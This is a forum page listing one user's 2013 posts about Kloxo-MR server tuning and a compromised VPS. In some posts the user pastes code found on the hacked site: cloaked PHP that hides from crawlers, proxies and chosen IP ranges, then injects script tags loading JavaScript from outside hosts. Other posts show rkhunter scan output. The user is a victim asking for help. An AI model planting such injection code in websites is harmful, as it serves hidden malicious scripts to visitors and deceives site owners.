Sponsor:

Server and Web Integrator
Link:
Kloxo-MR logo
6.5.0 or 7.0.0
Click for "How to install"
Donation/Sponsorship:
Kloxo-MR is open-source.
Donate and or Sponsorship always welcome.
Click to:
Click Here
Please login or register. 2024-03-28, 15:05:14

Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Messages - costa1988sv

Pages: [1] 2 3
1
Kloxo-MR Technical Helps / Re: Tweaks with config.
« on: 2013-03-08, 23:37:08 »
i tested only the mysql config, the differences are 5x better that default

2
GNU/Linux Helps / Re: Security Problems
« on: 2013-02-25, 20:12:17 »
I've disabled allow_url_fopen and allow_url_include
thank you for you help, i will install a fresh kloxo-mr when the backup will work

3
GNU/Linux Helps / Re: Security Problems
« on: 2013-02-25, 19:35:57 »
i upgraded to kloxo-mr from kloxo
last night i updated kloxo-mr
the other domains are not too popular, how he can modify files from script? curl, fopen?

4
GNU/Linux Helps / Re: Security Problems
« on: 2013-02-25, 18:46:02 »
and in php files
Code: [Select]
error_reporting(0);
$lang111 = $_SERVER['HTTP_ACCEPT_LANGUAGE'];
$useragent111 = $_SERVER['HTTP_USER_AGENT'];
$ip111 = $_SERVER['REMOTE_ADDR'];
$ip222 = substr($_SERVER['REMOTE_ADDR'], 0, 2);
if(strlen($_SERVER['HTTP_REFERER']))
{
    $referer = parse_url($_SERVER['HTTP_REFERER']);
    $referer['host'] = str_replace("www.", "", strtolower($referer['host']));

}
$iptarget = array("x103" , "x223" , "180", "110", "x39" , "114" , "118" , "222"  , "125" ,
"202"  , "203" , "66" , "74" , "182" , "111" , "219" , "27" , "116" ,
"119" , "61" ,"124", "141", "195", "64", "80", "82", "217", "89", "5", "31", "37", "46", "62", "77", "78", "79", "80", "81", "82", "83", "84", "85", "86",
 "87", "88", "91", "92", "93", "94", "95", "109", "128", "134", "146", "149", "151",
 "164", "171", "176", "178", "188", "193", "194", "195", "212", "213", "217");
$ugtarget = array("Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.19 (KHTML, like Gecko) Ubuntu/12.04 Chromium/18.0.1025.151 Chrome/18.0.1025.151 Safari/535.19","Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
"Mediapartners-Google" ,
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1");
$rfbad = array("3c21f107.linkbucks.com");
if (  $_SERVER['HTTP_X_FORWARDED_FOR']
   || $_SERVER['HTTP_X_FORWARDED']
   || $_SERVER['HTTP_FORWARDED_FOR']
   || $_SERVER['HTTP_CLIENT_IP']
   || $_SERVER['HTTP_FORWARDED']
   || $_SERVER['HTTP_VIA']
   || $_SERVER['HTTP_CLIENT_IP']
   || $_SERVER['HTTP_FORWARDED_FOR_IP']
   || $_SERVER['VIA']
   || $_SERVER['X_FORWARDED_FOR']
   || $_SERVER['FORWARDED_FOR']
   || $_SERVER['X_FORWARDED']
   || $_SERVER['FORWARDED']
   || $_SERVER['CLIENT_IP']
   || $_SERVER['FORWARDED_FOR_IP']
   || $_SERVER['CLIENT_IP']
   || $_SERVER['HTTP_PROXY_CONNECTION'])
{
 echo "";
}
elseif (isset($_SERVER['HTTP_REFERER'])){
if (in_array($ip222, $iptarget)) {
echo "";
 } elseif (in_array($useragent111, $ugtarget)){
echo "";

} elseif (!in_array($referer['host'], $rfbad)){
//echo "<script type="text/javascript" src="http://www.whackyvidz.com/Webservices/jsParseLinks.aspx?id=3c21f107"></script>";
//echo "<script src="http://yourjavascript.com/26202461412/my-overlay.js"></script>";
echo "<script type="text/javascript" src="http://yourjavascript.com/30131107225/h1.js"></script>";
}
}

5
GNU/Linux Helps / Re: Security Problems
« on: 2013-02-25, 18:40:00 »
today, he modified a text file, what i use with include
he added at the end
<script type="text/javascript" src="http://5.175.183.98/js/linkbucks.php"></script>

6
GNU/Linux Helps / Re: Security Problems
« on: 2013-02-25, 07:02:48 »
in top i have 15+  /usr/libexec/courier-authlib/authdaemond processes

my script is 200% more faster , but wordpress is 25% slower

7
GNU/Linux Helps / Re: Security Problems
« on: 2013-02-25, 05:54:53 »
switched to event an no more errors

8
GNU/Linux Helps / Re: Security Problems
« on: 2013-02-25, 05:34:44 »
# /script/sysinfo
A. Kloxo-MR: 6.5.0.c.2013022402
B. OS: CentOS release 5.9 (Final) i686
C. Apps:
   1. MySQL: mysql-5.0.96-1
   2. PHP: php53u-5.3.21-1.ius.el5
   3. Httpd: httpd-2.2.23-3.el5
   4. Lighttpd: --uninstalled--
   5. Nginx: nginx-1.3.13-1.el5
   6. Qmail: qmail-1.03-1.5.15

D. Php-type (for Httpd/proxy): php-fpm_worker

E. Memory:
                total       used       free     shared    buffers     cached
   Mem:          2048        805       1242          0          0          0
   -/+ buffers/cache:        805       1242
   Swap:            0          0          0

i installed new versioan and i get random 500 error an content encode error

9
GNU/Linux Helps / Re: Security Problems
« on: 2013-02-24, 20:18:09 »
the rootkit scan is was clean
how i update?
Current Version:   6.5.0.c.2013021802

10
GNU/Linux Helps / Re: Security Problems
« on: 2013-02-24, 17:17:01 »
sh /script/sysfo
sh: /script/sysfo: No such file or directory

11
GNU/Linux Helps / Security Problems
« on: 2013-02-24, 04:14:06 »
Someone is modifying files and mysql database on vps, the first time it modified files and stopped, after from mysql, and now again files, i changed the password, an switched to kloxo-mr, but and not fixed, he can don from my php script that?

[ Rootkit Hunter version 1.4.0 ]

 [1;33mChecking rkhunter version... [0;39m
  This version  : 1.4.0
  Latest version: 1.4.0
[ Rootkit Hunter version 1.4.0 ]

 [1;33mChecking rkhunter data files... [0;39m
  Checking file mirrors.dat [34C[  [1;32mNo update [0;39m ]
  Checking file programs_bad.dat [29C[  [1;32mNo update [0;39m ]
  Checking file backdoorports.dat [28C[  [1;32mNo update [0;39m ]
  Checking file suspscan.dat [33C[  [1;32mNo update [0;39m ]
  Checking file i18n/cn [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/de [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/en [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/zh [38C[  [1;32mNo update [0;39m ]
  Checking file i18n/zh.utf8 [33C[  [1;32mNo update [0;39m ]
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The file properties have changed:
         File: /etc/rkhunter.conf
         Current hash: 5a5dfd36c0278364949bdbd851ea9f4e086ac3bf
         Stored hash : abd46c79e524e6f0e3b58756b3332761019edf80
         Current size: 37361    Stored size: 37357
         Current file modification time: 1361644930 (23-Feb-2013 21:42:10)
         Stored file modification time : 1360752129 (13-Feb-2013 13:42:09)
Warning: Found enabled xinetd service: /etc/xinetd.d/pureftp
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_lxa
Warning: No output found from the lsmod command or the /proc/modules file:
         /proc/modules output:
         lsmod output:
Warning: The kernel modules directory '/lib/modules' is missing or empty.
Warning: The SSH and rkhunter configuration options should be the same:
         SSH configuration option 'PermitRootLogin': yes
         Rkhunter configuration option 'ALLOW_SSH_ROOT_USER': no
Warning: Suspicious file types found in /dev:
         /dev/.udev/uevent_seqnum: ASCII text
Warning: Hidden directory found: '/dev/.udev'
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Hidden file found: /usr/bin/.fipscheck.hmac: ASCII text
Warning: Hidden file found: /usr/bin/.ssh.hmac: ASCII text
Warning: Hidden file found: /usr/sbin/.sshd.hmac: ASCII text
Warning: Application 'openssl', version '0.9.8e', is out of date, and possibly a security risk.
Warning: Application 'sshd', version '4.3p2', is out of date, and possibly a security risk.

12
Kloxo-MR Technical Helps / Re: Backups
« on: 2013-02-23, 15:46:31 »
on my vps backup don't work
in contains only lxblank_fie

13
Kloxo-MR Technical Helps / Re: Tweaks with config.
« on: 2013-02-22, 04:02:30 »
i made a mistake, i switched to php-fpm_event

14
Kloxo-MR Technical Helps / Re: Tweaks with config.
« on: 2013-02-22, 03:28:53 »
switched to worker and all is good

15
Kloxo-MR Technical Helps / Re: Tweaks with config.
« on: 2013-02-22, 02:58:20 »
same thing, one and the other, the site is dead when has 20 visit per minute

Pages: [1] 2 3

Top 10 Social Networking:    Facebook    Twitter    LinkedIn    Pinterest    Google Plus    Tumblr    Instagram    VK    Flickr    Vine
Click Here

Page created in 1.874 seconds with 17 queries.

web stats analysis